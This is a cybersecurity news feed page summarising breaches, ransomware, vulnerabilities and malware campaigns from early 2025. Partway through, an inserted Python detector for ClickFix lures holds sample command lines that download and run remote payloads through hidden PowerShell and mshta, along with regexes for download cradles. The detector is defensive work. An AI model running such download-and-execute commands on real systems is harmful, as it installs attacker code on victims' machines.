Breaking Cyber News From Cyberint
Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.
- Feb 13, 2025: Cyber Attack on 'Shva' Disrupts Credit Transactions Across Israel
A cyber attack targeted Shva, a key provider of transaction infrastructure and financial information solutions in Israel, leading to a nationwide failure of credit card transactions. Reportedly, the company's systems experienced a 26-minute denial-of-service (DoS) attack, temporarily disrupting credit card payments.
- Feb 13, 2025: Threat Actor Offers Access to Israeli Electronics Company
A threat actor known as "CoreInjection" is offering access to an Israeli electronics company on the cybercrime forum BreachForums. According to the threat actor, this access could provide control over more than 4 million user accounts and is being sold for $50,000. However, the reliability of the threat actor remains unclear, and due to the lack of sample data, it is impossible to verify the authenticity of the claim.
- Feb 13, 2025: Exploitation of Critical Ivanti Connect Secure Vulnerability Leads to SPAWNCHIMERA Malware Deployment
Cybersecurity experts have identified the active exploitation of a severe vulnerability (CVE-2025-0282) in Ivanti Connect Secure (ICS) appliances, allowing remote attackers to execute code and infiltrate networks. The flaw, a stack-based buffer overflow with a CVSS score of 9.0, has been leveraged to deploy the advanced SPAWNCHIMERA malware, an evolution of the SPAWN malware family. SPAWNCHIMERA incorporates sophisticated techniques such as UNIX domain socket-based communication, dynamic patching of the vulnerability, enhanced obfuscation, and resistance to debugging, making it harder to detect and analyze. Despite Ivanti releasing patches in January 2025, thousands of devices remain exposed, highlighting the slow pace of remediation.
- Feb 13, 2025: North Korean Threat Actor Kimsuky Exploits PowerShell Trick to Hijack Devices
The North Korean-linked threat actor Kimsuky has been observed employing a new tactic that involves deceiving targets into executing malicious PowerShell commands under the guise of a South Korean government official. This approach includes spear-phishing emails with PDF attachments that prompt victims to follow a registration link, leading them to run harmful code that installs a remote desktop tool for data exfiltration. This method marks a significant shift in Kimsuky's operations.
- Feb 13, 2025: Global Expansion of Sandworm's BadPilot Campaign
A subgroup of the Russian state-sponsored hacking group Sandworm, known as Seashell Blizzard, has been linked to a multi-year initial access operation called BadPilot, targeting a wide range of sectors globally, including energy, telecommunications, and government entities. This operation has expanded significantly over the past three years, moving beyond its traditional focus on Eastern Europe to compromise systems in North America, Europe, and various other countries. The group exploits known vulnerabilities in software like Microsoft Exchange and Fortinet to gain access, employing a mix of opportunistic and targeted attacks to maintain persistent access and achieve strategic objectives aligned with Russian geopolitical interests.
- Feb 13, 2025: zkLend Suffers $9.5M Crypto Breach
"zkLend," a decentralized money-market protocol built on "Starknet", experienced a security breach resulting in the theft of 3,600 Ethereum, valued at $9.5 million. The incident exploited a rounding error bug in the smart contract's mint() function. "zkLend" has offered the threat actor a deal: return 90% of the funds (3,300 ETH) by February 14, 2025, and keep the remaining 10% as a whitehat bounty, avoiding legal repercussions. Otherwise, "zkLend" will pursue legal action with the help of security firms and law enforcement.
- Feb 12, 2025: Threat Actors Use ClickFix Technique to Deliver NetSupport RAT in 2025
Since early January 2025, threat actors have increasingly employed the ClickFix technique to deliver the NetSupport RAT, a remote access trojan, to victim systems. Initially designed as a legitimate remote IT support tool, NetSupport RAT has been repurposed by attackers to gain full control over compromised devices, enabling real-time screen monitoring, file manipulation, and execution of malicious commands. The ClickFix technique works by injecting a fake CAPTCHA page on compromised websites, tricking users into executing malicious PowerShell commands that download the RAT client from a remote server disguised as PNG image files. This method allows attackers to target organizations and steal sensitive data, including screenshots, audio, video, and files.
- Feb 12, 2025: XE Group Targets Supply Chains with Exploited Vulnerabilities to Deploy Web Shells and Reverse Shells
Threat actors, particularly the Vietnamese cybercrime group XE Group, have been exploiting multiple security flaws in software like Progress Telerik UI for ASP.NET AJAX and Advantive VeraCore to maintain persistent remote access on compromised systems. The group, known for evolving from credit card skimming to targeted information theft, is now focused on the manufacturing and distribution sectors, leveraging new vulnerabilities and advanced tactics. Recent exploitation of VeraCore flaws, including CVE-2024-57968 and CVE-2025-25181, has led to the deployment of ASPXSpy web shells and Meterpreter payloads, facilitating network scanning, data exfiltration, and command execution. This marks XE Group's first known use of zero-day vulnerabilities, showcasing a heightened level of sophistication. The group's persistence in maintaining access, even reactivating web shells years after initial deployment, reflects a strategic focus on long-term operations and systemic supply chain vulnerabilities.
- Feb 12, 2025: Threat Actors Exploit SimpleHelp RMM Vulnerabilities in Ransomware Campaigns
Threat actors are actively exploiting recently disclosed security flaws in SimpleHelp's Remote Monitoring and Management (RMM) software to gain initial access and establish persistence in networks, potentially paving the way for ransomware attacks. The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were disclosed in January 2025 and allow for privilege escalation, remote code execution, and information disclosure. Field Effect's investigation revealed that after exploiting these vulnerabilities, attackers performed network discovery, created administrator accounts, and set up a Cloudflare tunnel to facilitate lateral movement and stealthily route traffic.
- Feb 11, 2025: Threat Actor Arikos Claims MTN Ghana Data Breach
A threat actor known as "Arikos" has claimed responsibility for a significant data breach on the dark net forum "BreachForums," involving "MTN Ghana," a leading telecommunications provider. "Arikos" alleges possession of a full database dump containing sensitive customer information, including names, dates of birth, ID card details, WhatsApp numbers, company affiliations, email addresses, and over 150,000 customer photos. The data is being sold for $10,000. "MTN Ghana," headquartered in Accra, is a major player in the telecom sector with 15 million subscribers.
- Feb 11, 2025: SEO Manipulation Campaign Targets IIS Servers to Install BadIIS Malware and Redirect Users to Gambling Sites
A threat group, suspected to be the Chinese-speaking DragonRank, has been targeting Internet Information Services (IIS) servers across Asia, including in countries like India, Thailand, Vietnam, and Japan, as part of an SEO manipulation campaign to deploy BadIIS malware. The attackers are likely financially motivated, redirecting users to illegal gambling websites. Targets include government, university, technology, and telecommunications sectors. The compromised servers serve altered content, either redirecting to gambling sites or connecting to malicious servers. BadIIS alters HTTP response headers, checking specific fields to redirect users to suspicious pages. The malware shares similarities with other malware variants associated with groups involved in SEO fraud and proxy services.
- Feb 09, 2025: U.K.-Based Engineering Firm IMI Informs Investors of a Data Breach
In February 2025, UK engineering giant IMI became the victim of a data breach when threat actors managed to gain unauthorized access to its systems. According to IMI, the nature and extent of the data compromised have not been disclosed, but the company is currently responding to the cyber security incident and has engaged external experts to investigate and contain the attack.
- Feb 09, 2025: Handala Hack Claims Breach of Israeli Police
Handala Hack claims to have breached the Israeli police, allegedly obtaining 2.1TB of sensitive internal data. The group has released samples of the purported data, including photos of police officers, screenshots of documents such as permits and diplomas, and a link to download what they claim are 350,000 internal documents.
- Feb 09, 2025: Kimsuky Group Uses Spear-Phishing to Deploy ForceCopy Info-Stealer Malware
The North Korean hacking group Kimsuky has been observed conducting spear-phishing attacks to deliver a new information-stealer malware called forceCopy. The attacks begin with phishing emails containing a Windows shortcut file disguised as a Microsoft Office or PDF document. Opening the attachment triggers PowerShell or mshta.exe to download additional malicious payloads, including the PEBBLEDASH trojan, a custom Remote Desktop utility (RDP Wrapper), and proxy malware for persistent external communications. Kimsuky also uses a PowerShell-based keylogger and forceCopy to steal files from web browser directories, targeting credentials stored in browser configurations.
- Feb 06, 2025: Data Breach Exposes 100GB of Information from the Mexican Secretariat of National Defense
A threat actor group known as "OIHEC" claimed on the dark net forum "BreachForums" to have leaked confidential information from the "Mexican Secretariat of National Defense." According to the threat actor group, the data includes soldiers' credentials, emails, and more, all of which are available for purchase.
- Feb 06, 2025: Phishing Campaign Targets Microsoft ADFS to Bypass MFA and Steal Credentials
A phishing campaign targets organizations using Microsoft's "Active Directory Federation Services" (ADFS) to steal credentials and bypass multi-factor authentication (MFA). The threat actors primarily target education, healthcare, and government sectors, sending phishing emails impersonating IT teams and leading victims to spoofed ADFS login pages. Once the victim submits their username, password, and MFA details, the threat actors gain access to corporate email accounts, enabling them to conduct "business email compromise" (BEC) attacks and steal sensitive data. The threat actors also use techniques like VPNs to obscure their location and evade detection.
- Feb 05, 2025: Silent Lynx: New Threat Actor Targets Central Asia with Sophisticated Cyber Espionage Campaigns
The previously unknown cyber threat group Silent Lynx has been linked to cyberattacks targeting entities in Kyrgyzstan and Turkmenistan, including embassies, government-backed banks, and think tanks. The group's activities, believed to originate from Kazakhstan, focus on espionage against Eastern European and Central Asian organizations, particularly in economic decision-making and banking sectors. Their attacks typically begin with spear-phishing emails containing malicious RAR archives that deploy remote access payloads. The group uses multi-stage attack strategies, including ISO files, C++ binaries, PowerShell scripts, and Golang implants, often relying on Telegram bots for command execution and data exfiltration.
- Feb 05, 2025: AsyncRAT Campaign
Threat actors are running a new malware campaign that delivers the AsyncRAT remote access trojan (RAT) through a multi-stage attack chain exploiting Python payloads and TryCloudflare tunnels. The attack begins with a phishing email containing a Dropbox URL, which leads to a ZIP archive download. Inside, an internet shortcut file triggers a Windows shortcut (LNK) file that further escalates the infection. The LNK file uses TryCloudflare, a legitimate service, to expose a server and download a batch script that eventually deploys AsyncRAT.
- Feb 04, 2025: Grubhub Confirms Data was Taken in Recent Data Breach
In February 2025, Grubhub became the victim of a data breach when threat actors managed to gain access to its internal systems. According to Grubhub, personal details belonging to an undisclosed number of customers, merchants, and drivers were taken, including names, email addresses, phone numbers, and partial payment card information.
- Feb 04, 2025: Spear Phishing Campaign by Crazy Evil
The Russian-speaking cybercrime group Crazy Evil has been linked to over 10 active social media scams that use personalized lures to trick victims into installing malware like StealC, AMOS, and Angel Drainer. Specializing in identity fraud and cryptocurrency theft, Crazy Evil employs "traffers" to redirect legitimate traffic to malicious phishing pages, with the goal of compromising systems running on both Windows and macOS. The group, which has been active since at least 2021, operates primarily through Telegram and has made over $5 million in illicit revenue by targeting digital assets like NFTs, payment cards, and cryptocurrencies. Crazy Evil runs several sub-teams, each responsible for a specific scam, such as fake job offers or investment schemes, and has been known to provide affiliates with instructional materials to carry out attacks.
- Feb 03, 2025: Knesset of Israel Data Leak: Over 26,000 Documents Exposed
A data leak involving the "Knesset of Israel" and several other entities has surfaced on the dark web forum "BreachForums." The leaked dataset, attributed to the threat actor "dna," includes over 26,000 documents, totaling 16GB in size, primarily in PDF format.
- Feb 02, 2025: Data Breach by Threat Actors IntelBroker and EnergyWeaponUser on Daxium Exposes Sensitive User Information
In January 2025, "Daxium" experienced a data breach that exposed the personal information of 52,000 users, including email addresses and full names. The breach was published by the threat actors "IntelBroker" and "EnergyWeaponUser" on the dark net forum "BreachForums." The leaked data includes user IDs, document details, and various files and metadata linked to user accounts, all of which have been available for download.
- Feb 02, 2025: New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Phones for DDoS Attacks
A new variant of the Mirai botnet, known as "Aquabot," has been observed exploiting a medium-severity vulnerability (CVE-2024-41710) in Mitel phones to incorporate them into a network for launching Distributed Denial-of-Service (DDoS) attacks. This vulnerability, which allows command injection during the boot process of specific Mitel phone models, was addressed by Mitel in July 2024. The Aquabot variant has been active since November 2023 and has been detected attempting to exploit this vulnerability since January 2025. The botnet is reportedly being offered as a DDoS service on Telegram under various aliases.
- Feb 02, 2025: Threat Actor Leaks CSMP Database Allegedly Belonging to Cardinal Health As a Result of a Supply Chain Attack
On February 1, 2025, a threat actor named "0mid16B" claimed responsibility for leaking the Controlled Substance Monitoring (CSMP) database of Cardinal Health, Inc., the third-largest pharmaceutical wholesaler in the U.S. The data, dated January 18, 2025, was stolen following a supply chain attack on APEX Custom Software on January 16, 2025. The breach affected numerous pharmacy and healthcare clients, exposing sensitive information such as usernames, passwords, and facility details.
- Jan 29, 2025: 'Handala Hack' Claims Breach of Israeli Ministry of National Security
'Handala Hack' claims to have breached the Israeli Ministry of National Security, allegedly obtaining 4 TB of classified data. The stolen information reportedly includes confidential documents, screenshots of security officers' identification cards, recordings of police calls, and more. In addition, they purportedly compromised several emergency systems, triggering red alerts and broadcasting messages containing Hamas propaganda.
- Jan 29, 2025: E.Leclerc - Breach - 2025-01-23
A threat actor aliased "varun" announced the sale of a huge database belonging to Primes Energie Leclerc, a green energy supplier from France known for their bonus system, wherein they pay financial aid to beneficiaries who conduct energy-saving work. 4.7 million customers might be affected, as the threat actor claims that their sample data includes sensitive PII. At the time of writing, the threat actor had announced that the database had been sold.
- Jan 29, 2025: Ongoing Phishing Campaign Targets Poland and Germany With a Wide Range of Malware
A new phishing campaign targeting users in Poland and Germany has been detected; it has been conducted by a financially motivated threat actor since at least July 2024. The attacks, which begin with phishing emails disguised as financial institution or company communications, use malicious ".tgz" file attachments to deliver malware. Once opened, these files launch a .NET loader that activates PureCrypter, which in turn installs a previously undocumented backdoor, TorNet. TorNet communicates with the attacker's server over the Tor network, allowing for persistence and further intrusions. The actor employs various techniques to evade detection, such as disconnecting and reconnecting the victim's machine from the network and running anti-debugger and anti-malware checks. The malware also has the ability to execute arbitrary code, increasing the attack surface for further exploitation.
- Jan 29, 2025: Frederick Health Hospital Affected by Ransomware Incident, Emergency Services Impacted
"Frederick Health Hospital's" systems were taken offline this Monday following a ransomware incident, leading to significant disruptions in operations, including the diversion of ambulances to other emergency departments. The hospital was placed under a “mini disaster” designation, and its emergency department suspended operations, as it faced red and yellow alerts for no available beds and limited capacity to treat new patients.
- Jan 28, 2025: Smiths Group - Breach - 2024-12-27
British engineering firm Smiths Group is managing a cybersecurity incident that involved unauthorized access to its systems. Smiths Group said it was working with experts to recover its systems and to determine any wider impact. It added it would comply with all relevant regulatory requirements. The company did not provide further details and said it would give further updates as and when appropriate.
- Jan 28, 2025: DeepSeek AI Platform Temporarily Disables Registrations Due to DDoS Incident
Chinese AI platform "DeepSeek" has disabled new registrations on its DeepSeek-V3 chat platform following a believed large-scale DDoS incident. The incident, which targeted its API and Web Chat services, led the company to restrict new sign-ups to maintain service stability. Despite the issue, existing users can still log in, and new users can gain access via Google login. However, they will share personal information like name, email, and profile picture with "DeepSeek." The incident comes amid growing competition in the AI industry following the platform's recent surge in popularity due to its advanced AI model.
- Jan 27, 2025: SportAdmin - Breach - 2025-01-16
SportAdmin experienced a cybersecurity incident involving a data breach by an external attacker, resulting in system downtime and potential exposure of personal data. An investigation is underway, and the company is cooperating with authorities, with efforts in place to restore services and support affected users.
- Jan 27, 2025: Fratelli d'Italia Political Party Website Breach Exposes Personal Data
In 2024, a directory listing vulnerability on the website of "Fratelli d'Italia," a political party in Italy, was exploited by the threat actor known as "Truth-chan" to scrape and leak a large amount of personal data from approximately 12,000 to 13,000 CVs. The exposed data includes sensitive information such as names, emails, addresses, work experience, education, languages spoken, and more. The data was published on the dark web forum "BreachForums."
- Jan 26, 2025: Fake CAPTCHA Campaign Delivers Lumma Information Stealer
Threat Actors have been using fake CAPTCHA verification pages to deliver the Lumma information stealer in a new campaign, affecting victims in multiple countries, including Argentina, Colombia, the US, and the Philippines. The attack begins when a user visits a compromised site and is tricked into running a command that downloads an HTA file. This file executes a series of PowerShell scripts, eventually loading the Lumma payload while bypassing detection mechanisms. The campaign targets various industries, especially telecom, and leverages techniques that evade browser defenses by exploiting user interactions outside of the browser. The Lumma Stealer is part of a malware-as-a-service model and has become more difficult to detect due to its evolving delivery methods, including counterfeit domains mimicking popular sites like Reddit and WeTransfer.
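The NetSupport RAT and Lumma items above describe the same ClickFix mechanic: a fake CAPTCHA page coaxes the user into launching PowerShell or mshta outside the browser, which then fetches a payload (sometimes served as a PNG). As an added, defender-side illustration of how that chain looks in process-creation telemetry, the following Python scores constructed events for those patterns. This is example code written for this page, not Cyberint's or any vendor's detection content; the event format, process sets, indicator weights and alert threshold are assumptions, and 203.0.113.10 is a documentation address used only in the constructed sample.

```python
import base64
import re

# Constructed process-creation events (not real telemetry). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    'parent=explorer.exe image=powershell.exe cmd=powershell -w hidden -ep bypass -c "iex (iwr \'http://203.0.113.10/captcha/verify.png\' -UseBasicParsing)"',
    "parent=chrome.exe image=mshta.exe cmd=mshta http://203.0.113.10/check/a.hta",
    "parent=explorer.exe image=powershell.exe cmd=powershell -NoProfile -EncodedCommand SQBFAFgA",
    "parent=services.exe image=powershell.exe cmd=powershell.exe -NoProfile -File C:\\ProgramData\\backup\\nightly.ps1",
    "parent=explorer.exe image=notepad.exe cmd=notepad.exe C:\\Users\\alice\\notes.txt",
]

# Assumed process sets: a ClickFix lure is pasted into the Run dialog (explorer.exe) or launched
# from the browser that rendered the fake CAPTCHA, and lands in a script host.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Indicator name -> (regex, weight). Weights are illustrative assumptions, not a vendor ruleset.
INDICATORS = {
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    "download_cradle": (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "remote_hta": (re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), 3),
    "image_url_payload": (re.compile(r"https?://\S+\.(?:png|jpe?g|gif)\b", re.I), 1),
}
ENCODED_WEIGHT = 2
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
EVENT_RE = re.compile(r"parent=(\S+)\s+image=(\S+)\s+cmd=(.*)")


def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text) or return None."""
    m = ENCODED_CMD.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def score_command(cmd):
    """Return (score, hits); indicators are matched on the raw line and on the decoded payload."""
    hits, score, texts = [], 0, [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded_command")
        score += ENCODED_WEIGHT
        texts.append(decoded)
    for name, (rx, weight) in INDICATORS.items():
        if any(rx.search(t) for t in texts):
            hits.append(name)
            score += weight
    return score, hits


def analyze(lines, threshold=3):
    """Alert on script hosts launched from a user-facing parent with enough ClickFix indicators."""
    alerts = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        parent, image, cmd = m.group(1).lower(), m.group(2).lower(), m.group(3)
        # Scheduled or service-launched PowerShell is routine; only user-driven launches are scored.
        if image not in SCRIPT_HOSTS or parent not in USER_LAUNCHERS:
            continue
        score, hits = score_command(cmd)
        if score >= threshold:
            alerts.append({"parent": parent, "image": image, "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"{a['parent']} -> {a['image']} score={a['score']} hits={', '.join(a['hits'])}")
```

The parent-process gate is what keeps this from firing on ordinary automation: the same hidden, bypass-policy PowerShell line is benign when a scheduler starts it and suspicious when explorer.exe (the Run dialog) or a browser does. Decoding -EncodedCommand before matching matters because the page's lures hide the download cradle behind base64.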
- Jan 26, 2025: TalkTalk Data Leak Exposes Over 18 Million Users' Personal Information
In January 2025, a data leak involving "TalkTalk," a UK-based telecommunications provider, exposed the personal information of 18,839,551 current and former customers. The leaked dataset includes sensitive details such as full names, email addresses, phone numbers (both home and business), subscriber PINs, and IP addresses. This leak is being sold on the underground forum "BreachForums" by the threat actor known as "b0nd," with a price of $30,000, payable in XMR or BTC.
- Jan 23, 2025: Threat Actor Selling Database of Chilean Outsourcing Company ACobro
The threat actor known as "Sorb" is offering for sale a database potentially related to the Chilean outsourcing company "ACobro" on the cybercrime forum "BreachForums". According to the threat actor and the sample provided, the database contains 995K records with multiple users' details, such as RUT, name, phone, email, address, and document number. The price posted by the threat actor is $600.
- Jan 23, 2025: Threat Actor Selling Database of Peruvian Consulting Company TCobro
The threat actor known as "Sorb" is offering for sale a database potentially related to the Peruvian consulting company "TCobro" on the cybercrime forum "BreachForums". According to the threat actor, the database was copied in CSV format and includes 832K users' details. Furthermore, the threat actor claims to have access to the MySQL server and the web CRM panel. Based on the sample provided, the details include document ID, phone number, and client name. The price posted by the threat actor is $400, and "Sorb" states that the fastest buyer will also get administrator-level access to the MySQL server and web CRM panel.
- Jan 23, 2025: Octagon Reports Data Breach Affecting Consumer Information
"Octagon," a global sports and entertainment agency, has reported a data breach involving unauthorized access to sensitive consumer information, including names, Social Security numbers, driver’s license numbers, and financial account details. The company began notifying affected individuals on December 31.
- Jan 22, 2025: Spanish Guardia Civil and Ministry of Defense Data Leak
On January 20, 2025, it was revealed that a significant data leak had compromised members of Spain's Guardia Civil, Armed Forces, and Ministry of Defense. The leak is believed to be linked to a ransomware attack on Medios de Prevención Externos Sur SL, a third-party contractor responsible for medical examinations in March 2024. Three databases containing sensitive data have been published on the dark web, with two reportedly linked to Guardia Civil members and one to the Ministry of Defense. The exposed information includes names, email addresses, professional identifiers, dates of birth, and medical examination results, potentially affecting 109,000 Guardia Civil members and 84,000 Ministry of Defense personnel.
- Jan 22, 2025: Fake Homebrew Google Ads Spread Malware to Mac Users
A recent malicious Google ads campaign targeted "Homebrew" users, redirecting them to a fake "Homebrew" site (brewe.sh) that delivered "AMOS" malware to Mac and Linux devices. The malware, an infostealer, steals sensitive data such as credentials, browser information, and cryptocurrency wallets. "Homebrew" is a popular open-source package manager for macOS and Linux that allows users to easily install and manage software from the command line.
- Jan 21, 2025: Threat Actors Embed Malware in Images to Distribute InfoStealers
Threat actors have been using images to deliver malware such as the VIP Keylogger and 0bj3ctivity Stealer through separate campaigns. The attacks begin with phishing emails disguised as invoices or purchase orders, containing malicious attachments that exploit a known security vulnerability in Equation Editor (CVE-2017-11882) to run a VBScript file. This script decodes and executes a PowerShell script that retrieves an image from archive[.]org, extracting a Base64-encoded code which is converted into a .NET executable. This executable then downloads and runs malware, including the VIP Keylogger for data theft or 0bj3ctivity Stealer in a different variant.
- Jan 21, 2025: Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks
A new variant of the Mirai botnet, named "gayfemboy," has been discovered exploiting a zero-day vulnerability in Four-Faith industrial routers. This malware has been active since February 2024 and is primarily targeting routers with default credentials, utilizing over 20 known vulnerabilities for initial access. The botnet maintains around 15,000 daily active IP addresses, with infections mainly in China, Iran, Russia, Turkey, and the United States. The vulnerability, identified as CVE-2024-12856, has a CVSS score of 7.2 and allows for OS command injection on specific router models. The botnet has been conducting DDoS attacks against various entities, generating significant traffic.
- Jan 21, 2025: Ivanti Flaw CVE-2025-0282 Actively Exploited, Impacts Connect Secure and Policy Secure
A critical security vulnerability (CVE-2025-0282) affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways has been actively exploited since mid-December 2024. With a CVSS score of 9.0, this vulnerability is a stack-based buffer overflow that allows unauthenticated remote code execution. Ivanti has acknowledged that a limited number of its customers have been exploited due to this vulnerability. Mandiant, a cybersecurity company, has linked the exploitation of this vulnerability to a China-nexus threat actor known as UNC5337, which is considered part of a larger group (UNC5221). The attacks have led to the deployment of new malware families, including Dryhook and Phasejam. The threat actor also uses sophisticated methods, including log manipulation and the establishment of persistence mechanisms.
- Jan 21, 2025: Hewlett Packard Enterprise (HPE) Data Breach Exposes Sensitive Code and User Information
A data breach involving "Hewlett Packard Enterprise" (HPE) has been reported by threat actors on the dark net forum "BreachForums," including "IntelBroker," "zjj," and "EnergyWeaponUser." The breach has been ongoing for about two days and has compromised a wide range of sensitive data. This includes private source code from GitHub repositories, Docker builds, SAP Hybris, and certificates (both private and public keys). Additional data exposed includes product source code for Zerto and iLO, as well as old user PII related to deliveries. The stolen data is being offered for sale in exchange for Monero (XMR).
-
Jan 20, 2025
Google Project Zero Researcher Uncovers Zero-Click Exploit Targeting Samsung Devices
A newly discovered security vulnerability in the Monkey's Audio (APE) decoder on Samsung smartphones has been patched. This high-severity vulnerability, tracked as CVE-2024-49415, has a CVSS score of 8.1 and affects Samsung devices running Android versions 12, 13, and 14. The flaw allows remote attackers to execute arbitrary code through an out-of-bounds write in the `libsaped.so` library, specifically when Google Messages is configured for Rich Communication Services (RCS). The vulnerability can be exploited without user interaction, making it a zero-click attack. The researcher who identified this flaw is Natalie Silvanovich from Google Project Zero.
-
Jan 20, 2025
Apache Tomcat Vulnerability CVE-2024-56337 Exposes Servers to RCE Attacks
The Apache Software Foundation (ASF) has released a security update for its Tomcat server software to address a significant vulnerability that could lead to remote code execution (RCE) under specific conditions. This vulnerability, identified as CVE-2024-56337, is an incomplete mitigation of another critical flaw, CVE-2024-50379, which was previously addressed. Both vulnerabilities are time-of-check time-of-use (TOCTOU) race condition issues that can allow code execution on case-insensitive file systems when the default servlet is enabled for writing. Users of affected Tomcat versions are advised to make specific configuration changes based on their Java version to fully mitigate the risks.
-
Jan 20, 2025
Multiple Israeli Organizations Report Disruptions Linked to an Unknown Threat Actor
Several Israeli organizations have reported incidents where their printers were commandeered to produce pages containing pro-Palestinian propaganda. Additionally, reports indicate that files were corrupted, desktop wallpapers were altered, and other disruptions occurred. The identity of the attacker remains unconfirmed, and the full scope of the campaign has yet to be determined. The following hashes have been identified in connection with this campaign:
- C316C600E82B91ECE48EF74615F121DE5E05B79A
- 8cefad76c013e714c5cd8cff549b8c092ab2c9aa62ec9f22d2edf0e2c3cfdb9f (SHA256)
-
Jan 20, 2025
Microsoft Uncovers macOS Vulnerability CVE-2024-44243 Allowing Rootkit Installation
Microsoft has reported a newly discovered vulnerability in Apple's macOS, identified as CVE-2024-44243, which has been patched in macOS Sequoia 15.2. This medium-severity flaw (CVSS score: 5.5) allows attackers running as "root" to bypass the System Integrity Protection (SIP) of macOS, potentially enabling the installation of malicious kernel drivers and persistent malware. The vulnerability is characterized as a "configuration issue" that could allow malicious applications to modify protected areas of the file system. Jonathan Bar Or from Microsoft's threat intelligence team highlighted the serious implications of this vulnerability, including the potential for attackers to install rootkits and expand their attack surface. The vulnerability abuses the "com.apple.rootless.install.heritable" entitlement of the storage kit daemon (storagekitd) to bypass SIP protections.
-
Jan 20, 2025
Researcher Uncovers Critical Flaws in Multiple Versions of Ivanti Endpoint Manager
Ivanti has released security updates to address several critical vulnerabilities affecting its Endpoint Manager (EPM), Avalanche, and Application Control Engine. Four critical flaws, rated 9.8 on the CVSS scale, are related to absolute path traversal vulnerabilities in EPM, which could allow remote unauthenticated attackers to leak sensitive information. The vulnerabilities are identified by the following CVEs: CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159. These flaws affect EPM versions prior to the January 2025 security update. The vulnerabilities were discovered and reported by security researcher Zach Hanley from Horizon3.ai. Additionally, Ivanti patched multiple high-severity bugs in Avalanche and Application Control Engine that could allow attackers to bypass authentication and leak sensitive information. The company has stated that there is no evidence of these vulnerabilities being exploited in the wild and has enhanced its internal security measures.
-
Jan 20, 2025
Google Cloud Researchers Uncover Flaws in Rsync File Synchronization Tool - CVE-2024-12084
Multiple vulnerabilities have been disclosed in the rsync file synchronization tool that could allow attackers to execute arbitrary code on connected clients via a malicious server. The vulnerabilities include issues such as heap-buffer overflow, information disclosure, and path traversal. CVE identifiers have been assigned, and the most severe one (CVE-2024-12084) has a CVSS score of 9.8. Researchers from Google Cloud and a security researcher named Aleksei Gorban have been credited with discovering these flaws. Patches have been released to address these vulnerabilities, and mitigations are suggested for users unable to apply the updates.
Vulnerabilities discovered: CVE-2024-12084, CVE-2024-12085, CVE-2024-12086, CVE-2024-12087, CVE-2024-12088, CVE-2024-12747
-
Jan 20, 2025
Otelier Data Breach Exposes Millions of Hotel Reservation Records
A significant data breach has compromised the cloud-based hotel management platform "Otelier," affecting over 10,000 hotels globally. The breach exposed 7.8TB of sensitive data, including 7.4 million documents, MongoDB and SQL database dumps, email automation records, and more. The data contains personal information such as guest names, phone numbers, addresses, credit card details, and hotel reservation data for guests of major hotel chains like "Marriott," "Hilton," and "Hyatt." The breach occurred between July and October 2024, and the data was leaked by threat actor "Ay4me," who has made it available for sale on the darknet forum "BreachForums."